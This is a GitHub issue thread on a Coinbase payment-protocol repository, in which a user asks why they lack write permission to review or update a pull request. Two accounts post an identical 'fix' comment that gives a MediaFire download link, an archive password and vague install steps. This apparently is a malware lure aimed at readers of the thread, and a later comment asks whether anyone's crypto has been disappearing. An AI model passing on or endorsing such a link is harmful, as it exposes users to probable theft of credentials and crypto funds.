### ISSUE TITLE
Review Error for Nichebiche @ 2024-08-27 19:24:59 UTC

### ISSUE THREAD

**Issue by nichechristie** [coinbase/commerce-onchain-payment-protocol#27]
Review Error for Nichebiche @ 2024-08-27 19:24:59 UTC
User must have write permissions to review

_Originally posted by @cb-heimdall in https://github.com/coinbase/commerce-onchain-payment-protocol/pull/24#issuecomment-2313341757_

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by nichechristie** [comment]
For real, can someone just let me into I can learn some more.

**Comment by Jap43** [comment]
Fixed

**Comment by nichechristie** [comment]
How I still can’t update my branch with a pull request it still says I’m not a collaborator before I didn’t have write access but I have the main branch so why can’t I update it

**Comment by GHOST198991** [comment]
Thanks everyone. Hase anyone elses crypto been dissapearing?
